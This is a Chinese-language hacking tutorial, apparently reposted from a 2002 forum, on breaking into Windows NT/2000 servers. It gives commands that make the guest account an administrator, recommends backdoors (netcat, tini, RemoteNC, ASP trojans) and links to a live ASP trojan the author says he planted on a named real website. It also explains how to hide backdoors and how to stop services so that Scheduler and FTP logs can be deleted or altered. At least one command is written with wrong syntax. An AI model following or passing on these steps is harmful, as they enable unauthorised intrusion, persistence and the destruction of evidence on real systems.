介绍几个小工具和入侵的技法!

/ns/hk/hacker/data/20020805054657.htm

转自:蓝盾在线


    如果你已经夺取了一定的权限,比如,可写的!
那么运用下面两个软件,可以轻易的帮你入侵:
DNTUCli.exe
DNTUS26.exe
在命令提示下运行:
D:\>DNTUCli.exe

Usage: DNTUCli.exe <\\server>

DNTUCli.exe \\MachineName (remote server is \\MachineName)
DNTUCli.exe \\. (local server)

Copyright (C) 1991-2001 DameWare Development
www.dameware.com
当你输入ip的时候会让你输入用户和密码!
只要对方开了rpc而且你的用户有可写的权限的话!!

就会复制同一目录下的DNTUS26.exe,这种程序是自己安装而且自己打开服务的!
然后你就可以直接连接到对方的c了!
这种软件有CMD重定向功能・・・
 然后你就随便想做你的任何事情了!
C:\>net user

\\FYNET33 的用户帐户

----------------------------------
Administrator Guest
命令成功完成。

C:\>net user guest /active:yes
命令成功完成。
C:\>net user guest wry
命令成功完成。

C:\>net user localgroup administrators guest /add
命令成功完成。

这个时候你的guest已经是管理员了!!如果你禁止了net.exe或者被删除了你可以用
ftp命令下一个net.exe或者另外一个软件adduser.exe
用法:
D:\>addusers.exe
ADDUSERS {/c|/d{:u}|/e} filename [/t][/s:x] [/?] [\\computername|domainname] [/p
:{l|c|e|d}]
Error: too few arguments

现在你就是管理员了!要是感觉还不是很爽!呵呵!那么努力进它的内部网络吧!!
看:
一,进入第一台假设平台的nt服务器
通过简单的扫描器,只需带有简单密码验证的哪些就已足够扫出那些防范教差的机器。
通常的用户名不是空就是相同。
绑定netbeui协议的nt平台有个致命的弱点允许攻击者得到本地用户名列表
及采用暴力法不断验证他们的密码 。
然后,就是因为网管在意识上的不重视,攻击者几乎不需花很大的力气就能找到那些用户名和密码相同的
或密码为空的服务器。
二,攻击者控制服务器文件系统
有了密码对入侵者来说,绝对不是他们的最终目的!
隐射为本地盘,当入侵者得到你adminitrator组的任何一个成员的密码,或者是个普通用户的密码
这里我把具体命令cut了!
1,是administrator的成员时几乎可以隐射你任意一个盘。
2,普通用户将利用各种可能的机会得到更多的信息或直接利用web hole来获取更大的权限。
典型的手法有:利用web asp的功能!控制你整个硬盘 (注意iis的一些已知的漏洞 upload.asp)。

注意:利用asp 功能,攻击者同样能控制你硬盘上的大多数的文件(everyone的文件)


三,起动任何他们想要立即运行的程序

一般来说立即启动对nt来说是比较困难的,虽然有些入侵者会写几句命令,然后等待服务器重新
启动时,他的程序也将得以运行,但是我想对于大多数的攻击者来说,他们不会有那么好的耐心
他们会立即启动他们的东西(可能是些后门木马)。
在nt iis的web配置里有个选项是执行--------危险
攻击者将利用他控制你文件系统的任何一种方法把他要启动的程序放到那些允许执行的目录里去
然后他们将 http://www.xxx.com/cgi-bin/xxx.exe 利用web 启动该文件。
指出:iis 默认的一些目录带有可执行的权利 /script/tools/ ....

对于一些初级入侵者来说,他们往往启动的是些后门木马,然后对于那些经验丰富的入侵者
他可能对控制你一台机器已经显得毫无兴趣,他们可能真正的目的是控制你的整个网段。
这里值得注意的是,这些入侵者将会启动一个 等同于telnet shell for nt的东西
netcat ncx99.exe将在nt的99段口开启一个telnet服务端进程,等代攻击者的登陆

四,登陆取得最高权限

登陆后的入侵者在远端服务器并不具有最高的权限,他们将采用一些nt本地溢出变成admin
其中著名的程序是getadmin.exe

五,删除日志记录

任何一个入侵者都懂得保护他们自己!所以删除日志记录对他们来说是件很重要的事在这里
我建议网管采用第二硬备份或采用第三方日志记录系统。

由于nt的日志文件是当前进程运行操作的文件,他是根据时间来不断换新的操作文件的
任何人包括admin在内是无权删除或更改的。
而这里有个简单的不能在简单的原理,入侵者在取得admin权限后通过更改系统时间!让日志
记录进程转而记录另一个文件,然后更改他想更改的那个日志文件。

六,进入你的内部网

由于攻击者登陆你的 shell ,此时的他所具有的ip 等同于你这台机器上的内部地址
ftp 198.162.1.2
telnet 127.0.0.3
net view
net use * \\
都将在他们的手里变成入侵你内部网的工具,通过影射,然后在 cd z:
同时上述的攻击手段将再一次在内部网重演,扫描,破解,登陆。内部网络的速度将比远程
快很多,这无意给入侵者暴力破解打开了方便之门。

七,更多手段

可能话!他们会做一切你想不到的事!监听,ip欺骗。。。。。

但是,嗅探的方法是不可能在交换机的网络里抓到信息的!即使在内部网络里,我们的
目标就是拿到对方的密码才可以有访问的权限!
 如果你侥幸的有权限加到了域管理员!那么以上的都不要了!

我在把2000和nt下的后门拿出来说一下子:
如何做个好后门是很关键的;
1》推荐为小榕的RemoteNC,RemoteNC Beta 4 远程安装于NT/2000,提供CMD重定向功能
因为它具有cmd的重定向,也就是调用了对方的cmd,所以可以穿过放火墙后面的主机,传递信息但是必须要是administrator的身份安装
  唯一的不好的,现在这个软件已经被列入了病毒的行列了!我压缩了后,又被最新的kv3000杀死了!
2》现在推荐为蓝色火焰,目前还没有被查杀了,支持ftp,telnet 等多种方式!既然你已经获得了管理员权限了!
那么复制到对方的admin4\system32改一个隐蔽的名字!!
  然后用at命令或者直接用RemoteNC启动!,这个软件后门唯一不好处没有和exe关联!
很容易被删除的!
3》推荐为asp木马。这种木马永远不会被查杀!上传到对方主机有可执行的asp的目录下!
直接可以在浏览器上直接运行的!
比如:
http://www.fibrlink.com/flink/apply/cmdasp.asp 
这个站点,我做的asp木马,到我写的时候,还是可以用的!希望大家只是用来测试!
4》推荐为tini.exe这个后门软件,据说是永远不会被查杀的软件,因为它用的是window的shell通道!!呵呵!但是,我在测试的时候还是会被最新的锘盾杀死的!
  复制到对方主机上,运行后
就可以telnet对方的7777断口了!

如何把自己的后门程序隐藏的比较好?
1。取比较和系统文件的名字,比如:asp.exe管理员在删除的时候就的考虑了!
2。用attrib隐藏文件了。但是这样只是表面的隐藏!
3。运用一些活门的程序,比如:Explorer.exe 一般的这个程序都是在键值shell下的!
每次都会运行的!那么每次你的后门程序都会启动!
4。隐藏在数据流里!(稍后介绍)

后门做好了,不要万事大吉了!还要删除了自己的记录!

 Windows2000的日志文件通常有应用程序日志,安全日志、系统日志、smtp服务器日志,DNS服务器日志、FTP日志、WWW日志等等,可能会根据服务器所开启的服务不同而有所不同。还有一些网络管理软件的日志,说到这里,记得新浪的网管软件是自己开发的,如果不了解这个,可能会留下更多的记录!!!

1) Scheduler日志

Scheduler服务日志默认位置:2000下: %sys temroot%\schedlgu.txt NTworkstation下为 SchedLog.txt
可以打开schedlgu.txt
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
先停掉他 net stop "task scheduler" (注意不停是删不掉的)
然后再 del schedlgu.txt 或 schedlog.txt之后就OK了.
del sched*.txt
不过你如果不想删他,也可以改改它. 他的内容是这样的:
" "任务计划程序服务"
已退出于 01-5-22 20:37:34
"任务计划程序服务"
已启动于 01-5-25 7:07:37
"任务计划程序服务"
已启动于 01-5-25 7:26:36
"任务计划程序服务"
已退出于 01-5-25 8:47:54 "
很好改的.

(2) FTP日志

Internet信息服务FTP日志默认位置:%sys temroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志.
格式是这样的 ex*.log .
注意这是一台NT4的LOGFILES下的文件:
这台服务器下管理有多个HTTP或FTP站点

c:\winnt\sys tem32\logfiles 的目录

00-12-04 06:28p .
00-12-04 06:28p ..
01-05-18 12:56p MSFTPSVC1
01-04-23 11:28a MSFTPSVC2
01-01-12 11:56a MSFTPSVC3
01-06-01 08:12a SMTPSVC1
01-09-20 08:55a W3SVC1
01-08-02 10:36a W3SVC10
01-10-11 04:48p W3SVC11
01-07-11 09:16a W3SVC2
01-10-11 10:31a W3SVC3
01-10-10 04:55p W3SVC4
01-09-28 01:43p W3SVC5
01-10-11 08:44a W3SVC6
01-10-11 08:00a W3SVC7
01-09-30 01:49p W3SVC8
01-10-11 08:03a W3SVC9

看看日志文件的格式:
c:\winnt\sys tem32\logfiles\msftpsvc1\in010306.log
192.168.5.8, anonymous, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0,
0, 0, 331, 0, [3]USER, anonymous, -,
192.168.5.8, -, 01-3-6, 16:41:51, MSFTPSVC1, APPSERVER, 192.168.5.8, 0, 0, 0, 53
0, 1326, [3]PASS, IE30User@, -,
法一:> 这个时侯 net stop msftpsvc 停掉后台服务.
然后尽管 del ............
看这删吧,不要删的过火,把当天的删了就行. 别忘了再NET START MSFTPSVC 把服务打开.
法二:> 当然你如果还想更好,那就改改日志,可以改了系统时间后再改日志,只把你的清了,别忘了把时间改回来哦
实际上在得到ADMIN权限后,做这些事很容易.

法三 最傻瓜的清FTP日志的方法, cleaniislog !!

以上,难免有错误之处,因为俺也是个很菜的鸟,请高手赐教!有的地方,我懒的写就直接拿过来了!希望作者谅解!文章也很散乱,主要俺也是个很懒的人。只求菜鸟们能理解 !